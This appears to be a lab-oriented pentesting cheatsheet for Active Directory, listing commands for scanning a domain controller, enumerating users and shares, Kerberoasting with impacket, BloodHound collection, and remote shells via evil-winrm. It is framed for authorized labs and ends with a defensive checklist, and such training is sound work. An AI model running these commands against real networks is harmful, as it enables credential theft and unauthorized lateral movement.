All cheatsheets
Cheatsheet · advanced
AD first day
Lab-oriented first foothold → enum → BloodHound loop without random spraying.
Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.
active-directory
impacket
bloodhound
Situational awareness
Authorized AD lab only (GOAD, HTB, THM, etc.).
Command
nmap -sV -p 53,88,135,139,389,445,636,3268,3389 DC_IP
Command
nxc smb DC_IP -u user -p pass # or crackmapexec
Command
nxc smb DC_IP -u user -p pass --shares
Domain enum (creded)
Command
impacket-GetADUsers -all domain/user:pass@DC
Command
impacket-GetUserSPNs domain/user:pass@DC -request
Command
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c All
Common next paths (lab)
Command
# Kerberoast → hashcat -m 13100
Command
# AS-REP roast if preauth disabled
Command
# SMB/WinRM lateral with found creds
Command
evil-winrm -i HOST -u user -p pass
Checklist
- Lab snapshot taken before noisy actions
- BloodHound path explained in notes before exploit
- No password spray outside agreed rates
- Defenses written for each successful step